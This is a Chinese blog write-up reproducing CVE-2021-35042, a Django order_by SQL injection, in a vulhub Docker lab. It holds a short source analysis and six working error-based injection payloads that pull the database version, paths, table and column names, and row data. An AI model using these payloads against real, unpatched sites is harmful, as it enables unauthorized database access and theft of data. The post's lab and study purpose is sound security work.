Django SQL注入漏洞复现(CVE-2021-35042)

已于 2022-10-27 10:44:07 修改
阅读量6.4k 收藏 17
点赞数 2
文章标签: web安全
于 2022-04-08 16:44:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124045282
版权

一、漏洞介绍

Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。利用方式:1、用户认证:不需要用户认证 2、触发方式:远程,属于高危漏洞。

二、影响版本

Django 3.2
Django 3.1

三、源码分析

在add_ordering()函数中,进行如下了五个判断:字段中是否带点、字段是否为问号、字段开头是否为短横杠、判断是否在一个map字典、判断是否有额外的参数信息。如果全部参数无异常会进入self.names_to_path中进行数据获取,并进行相关逻辑处理,这个过程是不会进行SQL注入拼接的。

当用户输入的字段中带了点'id',就会跳出循环进入到_fetch_all中,这个时候会进行SQL查询:

注入点:

SELECT "vuln_collection"."id", "vuln_collection"."name" FROM "vuln_collection" ORDER BY ("id".) ASC。

四、环境搭建

git clone https://github.com/vulhub/vulhub.git
cd django

cd CVE-2021-35042

docker-compose up -d

五、漏洞复现

添加order=-id到 GET 参数。(本来用sqlmap测试的,结果没测试出来,还是手工注入吧)

改变参数大小写,报错,确定数据库为mysql,库名为cve,当前用户为root

1、查询根目录,/usr,

?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23

为什么order=vuln_collection.name),其中vuln是我们的应用程序和collection表,collection表中有id、name的字段。

2、确认数据库版本,5.7.37

?order=vuln_collection.name);select%20updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

3、查询库,cve

?order=vuln_collection.name);select%20updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)%23

4、查询表,django_migrations,vuln_collect

?order=vuln_collection.name);select%20updatexml(1,make_set(3,%27~%27,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())),1)%23

5、查询列,id、app、name、applied

?order=vuln_collection.name);select%20updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="django_migrations")),1)%23

6、查询内容 ,如下图所示

?order=vuln_collection.name);select%20updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,id,0x3a,app,0x23,name,0x23,applied,0x23) FROM django_migrations),0x7e),1)%23

ps:

`concat()`函数是将其连成一个字符串,因此不会符合`XPath_string`的格式,因此会造成格式错误 `0x7e` ASCII码,实为`~`,updatexml报错为特殊字符、字母及之后的内容,为了防止前面的字母丢失,开头连接一个特殊字符

六、修复建议

更新到最新版本

参考文档:

CVE-2021-35042 Django SQL注入漏洞复现_她总是阴雨天的博客-CSDN博客

Django SQL注入漏洞(CVE-2021-35042)_黑客技术

whatever`
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Django SQL注入漏洞CVE-2020-7471)
锋刃科技的博客
08-01 2812
简介 Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实利用的潜在SQL注入漏洞CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句。 影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 环境搭建 ..
17 - vulhub - Django GIS SQL注入漏洞CVE-2024-9402)
fdsgdsgdfw的博客
03-23 813
Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)2、用户在oracle的数据库且可控tolerance查询时的键名。
CVE-2021-35042 Django SQL注入漏洞
weixin_42345596的博客
08-03 2184
CVE-2021-35042 Django SQL注入漏洞 漏洞描述 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。 组件介绍 Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(
Django-CVE-2020-9402
最新发布
weixin_60567444的博客
05-17 301
在GIS 查询功能中存在的SQL注入漏洞,使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞
django SQL注入(CVE-2019-14234)
m0_65150886的博客
02-26 544
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。在1.11.x before 1.11.23、2.1.x before 2.1.11和2.2.x before 2.2.4的版本中,Django存在安全漏洞Django中使用了JSONField并且查询的“键名”可控,导致存在SQL注入漏洞
漏洞深度分析 | CVE-2023-36053-Django 表达式拒绝服务
LJQClqjc的博客
07-10 1276
当这个输入被URLValidator处理时,由于正则表达式的处理时间与输入的长度呈指数关系,所以可能会导致处理时间过长实导致服务拒绝。它由经验丰富的开发人员构建,解决了 Web 开发的大部分麻烦,因此您可以专注于编写应用程序,而无需重新发明轮子。这是因为正则表达式的处理时间与输入的长度呈指数关系,如果输入的长度非常大会导致处理时间过长,实DoS。在URLValidator中,增加了一个max_length属性,其值为2048,用于限制URL的最大长度。如果URL的长度超过这个值,将会抛出一个验证错误。
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
然而,在 Django 中的 GIS 查询中存在一个_sql 注入漏洞,编号为 CVE-2020-9402,这个漏洞允许攻击者执行恶意的 SQL 语句,从而获取敏感信息或控制服务器。 GIS 查询란什么? GIS 查询是 Geographic Information ...
CVE-2020-7471:django 漏洞CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 的漏洞环境和 POC
04-14
CVE-2020-7471这个仓库提供 CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 漏洞的环境和 POC受影响的 django 版本1.11 到 1.11.28(不含)2.2 到 2.2.10(不含)3.0 到 3.0.3(不含)下载使用前...
SQL注入漏洞演示源代码-曾是土木人
11-10
SQL注入漏洞是一种常见的网络安全问题,尤其在Web应用程序中尤为常见。这种漏洞允许攻击者通过在输入字段中插入恶意的SQL(结构化查询语言)代码,从而控制或操纵数据库,获取敏感信息,甚至完全接管系统。"SQL注入...
django-rest-captcha
05-27
Django Rest验证码django-simple-captcha轻量级版本,可与django-rest-framework 。特征速度:使用cache代替数据库安全性:用于生成密钥和图像的联合方法。 (一个键不能生成很多图像) 简单:只需一个rest api...
Django -CSRF漏洞
二进制杯莫停的博客
02-08 556
    跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 1 CSR...
Django JSONField SQL注入漏洞 & 原理分析
sGanYu
05-04 2390
关于这个漏洞前几天看了很多的文章,其实大部分payload是一样的,都是如何去构造,或者去命令执行一下,我一开始也是这样去做的,但是这个漏洞是怎么形成的,对我来说可能一知半解,或者说完全不了解,在后面学习的过程中感觉吃力又去补习了别的知识,比如Django的两个基类,ArrayField、JSONField,Json.objects.filter()和QuerySet相关的知识,包括ORM注入等等 1/漏洞原理 PostgreSQLSQLite3、MySQL、Oracle,在大部分情况下,以上四种
django-sql注入攻击
随风逆流的蒲公英的博客
06-18 404
什么是sql注入注入本质上就是把输入的数据变成可执行的程序语句,所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的查询,篡改命令。它能够轻易的绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所有的漏洞
Django sql注入及解决方案
pygodnet的博客
11-24 2409
Django sql注入及解决方案 前言:sql注入多产生在拼接sql语句的场景,对数据库进行越权访问或其他危险操作,危害极其严重,本文介绍在djangosql注入的预防措施。 示例: 简单的查询语句: my_connection = connections['default'] with my_connection.cursor() as cursor: sql = "select * from my_table where id=%s limit 10"%(pk) cursor.exe
漏洞Django_debug page_XSS漏洞(CVE-2017-12794)
过期的秋刀鱼
11-05 600
1.11.5版本,修了500页面中存在的一个XSS漏洞Django 1.11.5版本。再次刷新页面触发XSS。
buuctf [Django]CVE-2019-14234
qq_1873822的博客
03-23 810
漏洞描述 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出的原因在于Django中JSONField类的实Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 通过JSONField类获得KeyTransform类并生成sql语句的
Django注入
S1942177831的博客
05-13 225
1.登录网址:Log in | Django site admin 2.创建用户信息 3.输入信息 5.创建成功
sqlmap检测SQL注入及解决方案(Django--超详细
pygodnet的博客
01-07 1056
一:场景、演示 场景:查询等拼接SQL和参数的问题,博主为了检测,这里写一个有注入风险的接口,请勿模仿 class PostMan(View): def get(self, request): aa = request.GET.get('aa') with connections['default'].cursor() as cursor: sql = 'select * from sys_dict where pid = %s'%(aa)
eyoucms1.6sql注入漏洞
06-09
为了避免漏洞被利用,我不能提供直接的漏洞步骤,但我可以告诉您该漏洞的一般性情况和解决方法。 eyoucms 1.6存在多个SQL注入漏洞,攻击者可以利用这些漏洞在系统中执行恶意代码,获取系统权限,窃取敏感信息等。 解决这些漏洞的方法包括: 1. 及时升级eyoucms到最新版本,开发者通常会根据安全漏洞进行版本升级。 2. 在使用eyoucms时,严格遵循安全规范,例如不要使用默认的管理员账号和密码,不要将敏感信息存储在公共文件夹中,限制文件上传和下载的类型和大小等。 3. 对于已知的SQL注入漏洞,可以通过修改程序代码或使用安全补丁来修漏洞。 4. 加强服务器的安全性监控和防御能力,例如安装防火墙、入侵检测系统和安全审计系统等,及时发并阻止攻击。 如果您怀疑系统已经受到攻击,请立即停止服务器,并进行全面检查和修

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值